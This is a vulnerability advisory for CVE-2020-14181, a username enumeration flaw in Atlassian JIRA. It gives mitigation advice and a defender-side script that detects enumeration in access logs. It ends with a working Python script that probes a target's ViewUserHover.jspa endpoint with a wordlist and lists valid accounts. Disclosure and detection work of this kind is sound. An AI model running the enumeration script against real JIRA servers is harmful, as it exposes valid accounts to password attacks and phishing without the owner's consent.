Vendor: JIRA
By: Dolev Farhi
CVSS: 5.3 (MEDIUM)
Type: User Enumeration
CWE: 200
Product Name: JIRA
Affected Version From: < 7.13.16, 8.0.0
Affected Version To: < 8.5.7, 8.6.0
Patch Exists: YES
Related CWE: CVE-2020-14181
CPE: a:atlassian:jira
Other Scripts: N/A
Platforms Tested: None
Year: 2020

Atlassian JIRA 8.11.1 – User Enumeration

This vulnerability allows an attacker to enumerate valid usernames on Atlassian JIRA versions < 7.13.16, 8.0.0 ≤ version < 8.5.7, and 8.6.0 ≤ version < 8.12.0. A GET request to the /secure/ViewUserHover.jspa endpoint with a candidate username returns a response whose body contains the string 'User does not exist' for unknown accounts; if that string is absent, the username is valid. The response therefore leaks account existence (CWE-200). This vulnerability was discovered by Dolev Farhi and was assigned CVE-2020-14181.

Mitigation:

Upgrade to a fixed version of Atlassian JIRA (7.13.16, 8.5.7, or 8.12.0 and later, per the affected ranges above). Additionally, ensure that the ViewUserHover.jspa endpoint is not publicly accessible, for example by restricting it at the reverse proxy to authenticated or internal users.
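The mitigation above reduces exposure; as an added defender-side example (not part of this Exploit-DB entry or of Atlassian's code), the following Python script parses combined-format web access logs and flags source IPs that query /secure/ViewUserHover.jspa for many distinct usernames within a short window, which is the footprint a wordlist-driven enumeration leaves. The sample log lines are constructed, and the 60-second window and five-name threshold are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/secure/ViewUserHover.jspa"
# Combined log format: the client IP, timestamp and request target are all we need.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*"')

def parse_line(line):
    # Return (ip, timestamp, username) for a ViewUserHover.jspa hit, otherwise None.
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    user = parse_qs(url.query).get("username", [None])[0]
    if url.path != ENDPOINT or user is None:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"), user

def find_enumeration(lines, window_seconds=60, min_distinct_users=5):
    # Flag each source IP that looks up >= min_distinct_users distinct usernames inside
    # any window_seconds span; a real user hovers over a few names, not a wordlist.
    hits = defaultdict(list)
    for ip, ts, user in filter(None, map(parse_line, lines)):
        hits[ip].append((ts, user))
    alerts = {}
    for ip, events in hits.items():
        events.sort()
        start = 0
        for end in range(len(events)):  # sliding window over the time-ordered hits
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            if len({u for _, u in events[start:end + 1]}) >= min_distinct_users:
                alerts[ip] = sorted({u for _, u in events})  # every name this IP probed
                break
    return alerts

def _line(ip, second, target):
    # Constructed sample access-log line (not real traffic) for the demo data below.
    return f'{ip} - - [10/Sep/2020:12:00:{second:02d} +0000] "GET {target} HTTP/1.1" 200 512 "-" "Mozilla/5.0"'

SAMPLE_LINES = [_line("203.0.113.7", i, f"{ENDPOINT}?username={u}")  # one IP, six names in 6 s
                for i, u in enumerate(["admin", "jsmith", "root", "svc_jira", "bob", "alice"])]
SAMPLE_LINES += [_line("198.51.100.4", 3, f"{ENDPOINT}?username=jsmith"),  # ordinary hovers
                 _line("198.51.100.4", 40, f"{ENDPOINT}?username=alice"),
                 _line("198.51.100.4", 41, "/browse/PROJ-1"), "not a log line"]
```

Running find_enumeration(SAMPLE_LINES) reports only 203.0.113.7; because access logs do not record the response body, the detection keys on request volume and username diversity rather than on the 'User does not exist' string.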

Exploit-DB raw data:

# Title: Atlassian JIRA 8.11.1 - User Enumeration
# Author: Dolev Farhi
# Vulnerable versions: version < 7.13.16,  8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.12.0
# CVE: CVE-2020-14181
# Credit to original CVE author: Mikhail Klyuchnikov of Positive Technologies.

import sys
import os
import requests

def usage():
    print('python3 script.py <target> <usernames_file>')
    print('e.g. python3 script.py https://jiratarget.com usernames.txt')
    sys.exit()

if len(sys.argv) < 3:
    usage()

server = sys.argv[1]
usernames = sys.argv[2]

# A name that should not exist on any real instance.
random_user = '0x00001'

# os.path.exists() returns False instead of raising, so check its result directly.
if not os.path.exists(usernames):
    print(usernames, 'file does not exist.')
    sys.exit(1)

def lookup(username):
    # Fetch the user hover card; requests URL-encodes the username for us.
    return requests.get('{}/secure/ViewUserHover.jspa'.format(server),
                        params={'username': username}).text

def test_vulnerable():
    # The endpoint is usable for enumeration if it reports the bogus name as nonexistent.
    return 'User does not exist: {}'.format(random_user) in lookup(random_user)

if not test_vulnerable():
    print('server is not vulnerable.')
    sys.exit(1)

with open(usernames, 'r') as f:
    for username in f.read().splitlines():
        if 'User does not exist' not in lookup(username):
            print('EXISTS', username)